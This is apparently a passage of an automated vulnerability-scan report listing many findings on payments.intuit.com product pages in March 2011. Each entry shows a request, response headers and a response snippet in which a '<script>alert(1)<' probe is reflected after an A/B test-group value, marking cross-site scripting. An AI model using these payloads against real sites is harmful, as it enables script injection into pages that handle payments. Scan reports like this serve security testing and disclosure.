HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:58:30 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95A83170A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92671 ...[SNIP]... <input id="testGroup" value="T161e4c4"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:10 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C09510A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92658 ...[SNIP]... <br /> A/B Test Group: T16f2d55<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:07 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID= X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95DCFDA0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 101826 ...[SNIP]... <br /> A/B Test Group: T16d080e<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:12 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C100A0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 101839 ...[SNIP]... <input id="testGroup" value="T163a8df"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:57 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E93040A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 134948 ...[SNIP]... <input id="testGroup" value="T16dbe34"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:51 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96051670A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 134934 ...[SNIP]... <br /> A/B Test Group: T16e5954<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:58:54 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AE16F0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92658 ...[SNIP]... <br /> A/B Test Group: T1640826<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:57:24 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95981070A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92673 ...[SNIP]... <input id="testGroup" value="T161f63b"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:56 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9614D8C0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 151814 ...[SNIP]... <br /> A/B Test Group: T16ae697<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:26 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FF17B0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 151828 ...[SNIP]... <input id="testGroup" value="T16671c4"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:33 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=3dHufc X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9600CF00A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 110761 ...[SNIP]... <br /> A/B Test Group: T16ac6ae<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:33 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E37AB0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 110773 ...[SNIP]... <input id="testGroup" value="T16b0c27"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:08 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=U3 X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C018A0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 96470 ...[SNIP]... <br /> A/B Test Group: T163b445<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:58:47 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95AC4050A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 96483 ...[SNIP]... <input id="testGroup" value="T1647c3d"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:16 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95DF3390A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 109447 ...[SNIP]... <input id="testGroup" value="T1683731"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/check |
GET /products/check Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:00 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F89450A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 109433 ...[SNIP]... <br /> A/B Test Group: T16d7ba9<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/echecks-and |
GET /products/echecks-and Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:37 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID= X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9601C8F0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145475 ...[SNIP]... <input id="testGroup" value="T16bfe97"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/echecks-and |
GET /products/echecks-and Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:56 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9614F610A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 145461 ...[SNIP]... <br /> A/B Test Group: T16e3cdf<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/internet |
GET /products/internet Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:40 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F3CC20A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116390 ...[SNIP]... <br /> A/B Test Group: T1694dbf<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/internet |
GET /products/internet Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:49 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D89780A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116404 ...[SNIP]... <input id="testGroup" value="T16a32b2"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/online-credit |
GET /products/online-credit Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:03:27 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F07690A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116192 ...[SNIP]... <input id="testGroup" value="T16e40f2"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/online-credit |
GET /products/online-credit Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:21 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=dCkX6oL- X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960C52D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 116179 ...[SNIP]... <br /> A/B Test Group: T16ff5ed<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:41 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=5 X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96117780A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140388 ...[SNIP]... <br /> A/B Test Group: T166fb36<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:03 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=zRzKl X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95F946E0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 140401 ...[SNIP]... <input id="testGroup" value="T1666866"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:25 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=L X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95FEAFE0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 100552 ...[SNIP]... <br /> A/B Test Group: T16d3b88<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/quickbooks |
GET /products/quickbooks Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
